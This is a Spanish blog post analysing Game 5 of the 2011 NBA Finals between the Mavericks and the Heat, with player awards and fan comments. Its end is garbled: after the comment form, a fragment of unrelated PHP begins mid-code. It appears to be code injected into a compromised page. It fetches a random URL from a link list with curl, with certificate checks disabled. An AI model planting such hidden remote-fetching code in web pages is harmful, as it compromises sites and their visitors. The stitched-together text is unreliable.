La Gran Final (09/05/2011): Dudas existenciales

10 de June de 2011 por TheDeerHunter

Capacidad de adaptación. Parece una obviedad señalarla como clave. En una serie a 7 partidos el que se adapta a los distintos escenarios y situaciones, así como a las oscilaciones emocionales, se suele llevar el gato al agua.

Los Mavericks han demostrado ser capaces de renunciar a si mismos para entrar en el barro y las trincheras del juego defensivo de Miami, saber jugar y ganar por debajo de 90 puntos contra natura o resistir imponderables como la fiebre de Nowitzki, la lesión de Haywood o la previamente asumida de Butler. Han sabido encajar una situación crítica tras el tercer choque, el baño de agua fría justo después de su primera victoria en Miami. Se han mantenido serenos ante triples imposibles de unos Heat crecidos, ante un Wade en estado de gracia, ante el paso atrás de Dirk sometido por Haslem en su única mancha de la serie. Han ajustado contra pronóstico, defendiendo mejor con Barea que con Stevenson, renunciando puntualmente a Marion para defender con tres pequeños con éxito o al papel en la segunda unidad de Stojakovic.

Los Heat se ven ahora contra las cuerdas y les cuesta encontrar nuevas soluciones. No hay defensa que valga contra lo que les cayó anoche del cielo. 13 triples con casi un 70% de acierto, rozando récord. En la cresta de la ola hasta las peores mandarinas de los Mavs iban dentro y ahora ellos sufren la peor crisis de confianza de la postemporada. 2 partidos seguidos en los que Wade&LeBron combinan un 4-22 exterior. “The King” viene promediando 2,2 puntos durante los 5 últimos cuartos disputados estas finales… Ni siquiera les sirve ya el impacto defensivo de Haslem sobre Nowitzki que, aún algo mermado anoche, hizo lo que le vino en gana, ni el excelente partido de Miller y Chalmers.  Por si faltaba algo anoche sintieron el miedo viendo a Wade retirarse lesionado. Por suerte para ellos volvió, aunque no a tiempo para evitar la sangría que causó Terry y/o Barea. Fueron los de la serie contra Lakers.

De lo de “quien gana el tercero gana la final” hemos pasado a que “quien gana el 5º suele ganar la final” y a que “los jugadores que hacen triples dobles en una final y aún así pierden terminan subcampeones”. No son buenos presagios para Miami, pero lo más difícil para Dallas está en un American Airlines ajeno. Veamos si tienen lo que hay que tener para ser campeones.

PREMIOS

MVP: Dirk Nowitzki anotó 29 puntos, pero los 21 de Jason Terry (en un 8 de 12) más sus 4 rebotes y 6 asistencias, fueron tanto o más importantes que los del alemán. Ya comentábamos que los Mavs le echaban mucho de menos.

Sorpresa: 17 puntos para JJ Barea que se ha hecho con el puesto de titular en toda una final de la NBA. ¡Quien se lo iba a decir hace un par de años!

Decepción: Imposible destacar a un jugador como decepción del partido, todos cumplieron con su cometido.

Esfuerzo en vano: Lebron James se resarció en parte de su mal partido anterior con todo un señor triple doble (17 puntos, 10 rebotes y 10 asistencias). Sin embargo, su actuación en el último cuarto volvió a ser paupérrima al anotar sólo 2 puntos.

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. Txusma dice:
    #1

    Por responder el comentario de Denise en el otro post:

    4-2 ya no será y el Big Three se convierte en otra cosa cuando llega el último cuarto. Alguien está desapareciendo una y otra vez misareblemente.

      Citar

  2. Pirata dice:
    #2

    El orden de victorias-derrotas/equipo de casa/fuera es el mismo del año pasado verdad?

      Citar

  3. pcerezo dice:
    #3

    No estoy de acuerdo con lo esfuerzo en vano. Un triple doble tan falso como una moneda de chocolate.
    A estas alturas de película es inasumible su inoperancia en los últimos cuartos. Estigma?
    El verdadero esfuerzo en vano lo hizo Wade que volvio lesionado…
    La incapacidad de Lebron James para leer ciertas defensas es realmente preocupante, se convertirá en excelso jugador el día que añada la suspensión a su juego, en ese momento se podrá hablar de aproximarse a Jordan, esa faceta del juego fue la que distinguió al Jordan de los seis anillos del Jordan de los 80.

    La NBA le debe un anillo a esta franquicia de Dallas que ha tenido grandes equipos y que tiene a un jugador que en las próximas votaciones de los 50 mejores de la historia va a estar sin duda.

    Un saludo,
    Pablo

      Citar

  4. Rompe dice:
    #4

    Impresionante la serie de tiros libres de Dirk en estos PO. Anoche, de nuevo, 10/10. Y por encima del 50% tanto en tiros de 2 como de 3. ¡¡Impresionante Robin Hood!!

      Citar

  5. Txusma dice:
    #5

    Habrá que actualizar la lista de los 50 que hicimos hace un par de años… Si

    http://blog.tjnba.com/2009/08/31/los-50-mejores-jugadores-de-la-historia/

    Al menos ya lo consideramos el 10º mejor ala-pívot pero con anillo y tras las exhibiciones que ha protagonizado en estos playoffs ha de subir escalones. Por encima de Chris Webber seguro.

    http://blog.tjnba.com/2009/07/10/los-mejores-cuatros-de-la-historia/

      Citar

  6. Blade Petrovic dice:
    #6

    Golpe importante de Dallas que si tiene la misma repercusión que en 2006……….
    Por cierto otra sanción a Arenas esta vez por un comentarío en Twitter

      Citar

  7. Denise dice:
    #7

    Tranqui Txusma que todavía queda como mínimo un partido, y yo huelo a séptimo.
    No demos por muerto todavía a los Heat y en especial a Lebron, que después pasa lo que pasa. Eso sí, hoy los Mavs han hecho un partidazo, y al menos ha sido un buen partido ofensivo, y no uno a 80 puntos.
    Acordaros que los Lakers estaban en la misma situación el año pasado.

      Citar

  8. Pirata dice:
    #8

    A esto ultimo me referia yo antes, sèrie calcada a la de hace un ano, de momento………..

      Citar

  9. HisRoyalAirness dice:
    #9

    Bueno, aún acabo de ver el partido y da bastante que hablar: el triple doble de Lebron me parece una inutilidad, queda muy bien pero no le ha servido a su equipo de nada. Falta Wade, repito que para mì es el mejor y el lìder indiscutible de los Heat salvo en la serie contra Celtics, y todo se desmorona. No se trata simplemente de números, se trata de que en Miami, a parte de anotar, defender, asistir y dar un paso adelante hay un solo jugador que ponga cordura y sepa leer cada momento del partido, y su nombre es Dwayne Wade.

    Respecto a Dirk no hay mucho que añadir porque está haciendo unos playoffs y finales de absoluta leyenda, que realmente es lo que es y va a ser.
    Barea es mucho mejor defensor de lo que parece a primera vista y un anotador cojonudo, con mucho repertorio. Terry también ha estado tremendo. Lo único que me preocupa de Dallas es que me parece que estos 2 secundarios dependen mucho del entorno y pueden apagarse en Miami.

    Qué partidazo

      Citar

  10. Tobal dice:
    #10

    Qué gran partido de Dallas,con un gran acierto desde la linea de tres puntos,nada menos que un 68% de efectividad,a lo que hay que sumar un 57% en tiros de campo,con un gran juego de equipo,terminaron arrollando en el último cuarto a Miami,con un sensacional Jason Terry que con 21 puntos y 6 asistencias fue una pesadilla para la defensa de los Heat,pero gran partido de un sorprendente Barea que se echó el equipo a la espalda,aportando 17 puntos,5 asistencias y 4 triplazos nada menos,pero es no me quiero olvidar del buen partido de Tyson Chandler que de nuevo se fajó bajo tableros y terminó con 13 puntos,7 rebotes y 2 tapones y de nuevo partidazo del gran Nowitzki,con 29 puntos,6 rebotes y ! 10 de 10 en tiros libres !,que jugadorazo Dios mio,está muy cerca de su primer anillo,espero que lo consiga de una vez, tanto él como todo el equipo,que ya se lo merecen,después de tantos años de gran juego y de presencia en Play Offs

      Citar

  11. manu dice:
    #11

    Aquí tenemos a los graciosetes Lebron y Wade riéndose de Dirk:

    http://www.youtube.com/watch?v=u12gHc_pJZk

    Vaya par de flipados.

    Karma is a bitch, Lebron…

      Citar

  12. Viva_Dirk dice:
    #12

    Ya va siendo hora de que haya un poco de justicia, ¡¡¡¡¡go mavs go!!!!!

      Citar

  13. German dice:
    #13

    Sos gigante Dirk Nowitzki, te lo merecias.

      Citar

  14. Vader dice:
    #14

    Que alegria me he llevado, Kidd, Dirk, Terry… se lo merecian.

    Saludos

      Citar

  15. Rompe dice:
    #15

    Miami ya ganará anillos a cascoporro esta década. Por fin el baloncesto ha hecho justicia con Nowitzki y Kidd!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>